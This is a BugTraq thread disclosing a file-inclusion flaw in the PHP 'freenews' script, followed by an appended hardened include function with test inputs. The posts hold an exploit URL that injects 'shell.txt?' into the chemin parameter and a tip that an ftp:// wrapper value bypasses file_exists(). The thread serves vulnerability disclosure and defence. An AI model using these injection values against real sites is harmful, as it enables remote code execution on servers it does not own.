BugTraq
freenews---> fileinclude Oct 28 2006 11:25PM
xp1o msn com ( MoHaNdKo ) (1 replies)
Re: freenews---> fileinclude Oct 30 2006 09:18PM
Tamriel (tamriel gmx net) (1 replies)
Re: freenews---> fileinclude Oct 31 2006 10:22AM
pokley (pokleyzz scan-associates net)
In PHP 5.x, the file_exists function has support for Protocols/Wrappers.
So setting $chemin to ftp://blablablab.com/ will work in this case.

On Tue, 31 Oct 2006 05:18:58 +0800, Tamriel <tamriel (at) gmx (dot) net> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> I would quote the whole code around the includes, like:
>
> [...]
> if (file_exists("./".$chemin."/config.php")){
> include ("$chemin/config.php");
> include ("$chemin/options.inc.php");
> include ("$chemin/freenews_functions.inc.php");
> }
> [...]
>
> You could only include files on the same server, not remote and not a
> shell.txt.
>
>
> MoHaNdKo wrote:
>> ########################################################
>> #
>> #freenews---> fileinclude
>> ###############################
>> #
>> #include ("$chemin/config.php");
>> #include ("$chemin/functions.inc.php");
>> #include ("$chemin/options.inc.php");
>> #******************************************
>> #name: MoHaNdKo
>> #E-mail : xp1o (at) msn (dot) com
>> #
>> #
>> #********************
>> #exploit:
>> # www.****.com/path/aff_news.php?chemin=shell.txt?
>> #
>> #
>> #********************
>> #Greatz:
>> # www.xp10.com & www.d4eg.org & www.dmazika.org
>> #
>> # www.tryag.com
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (MingW32)
>
> iD8DBQFFRmxCqBhP+Twks7oRCqoAAJ9YaqJn7Mdptjgc17uIV76Qcy5eVwCfRNpf
> DmmJNRb3gp/R32Dq8dINQks=
> =BGMI
> -----END PGP SIGNATURE-----
>

--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
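
A hardened form of the include block quoted in this thread, as an added example that is not part of the original posts or the freenews code: it does not treat file_exists() as a guard, and instead rejects any $chemin that carries a URL scheme and requires the resolved directory to sit under a fixed base directory. The function name safe_include_dir() and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example (not freenews code). safe_include_dir() is a hypothetical helper.
// Returns the resolved local directory for $chemin, or null if it must not be used.
function safe_include_dir(string $chemin, string $baseDir): ?string
{
    // Reject NUL bytes and anything with a stream-wrapper scheme
    // (ftp://, http://, php://, data:, ...), regardless of what file_exists() says.
    if (strpos($chemin, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $chemin)) {
        return null;
    }
    // realpath() resolves only existing local paths and collapses "..".
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $chemin);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // The resolved directory must sit strictly below the base directory.
    if (strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

// Constructed demo: a throwaway base directory with one legitimate sub-directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'freenews_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'news', 0700, true);
$cfg = $base . DIRECTORY_SEPARATOR . 'news' . DIRECTORY_SEPARATOR . 'config.php';
file_put_contents($cfg, "<?php // constructed placeholder\n");

// Constructed inputs: one legitimate value, then the values discussed in the thread
// and a parent-directory reference.
foreach (['news', 'ftp://blablablab.com/', 'shell.txt?', '..'] as $chemin) {
    $dir = safe_include_dir($chemin, $base);
    if ($dir === null) {
        printf("%-24s => rejected\n", $chemin);
        continue;
    }
    // Only a validated, local, contained directory ever reaches include.
    include $dir . DIRECTORY_SEPARATOR . 'config.php';
    printf("%-24s => included from %s\n", $chemin, $dir);
}

// Remove the constructed demo files.
unlink($cfg);
rmdir($base . DIRECTORY_SEPARATOR . 'news');
rmdir($base);
```

Setting allow_url_include to Off in php.ini (a directive available from PHP 5.2) is a second layer for remote wrappers, but it does not replace validating $chemin, since local paths remain reachable.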
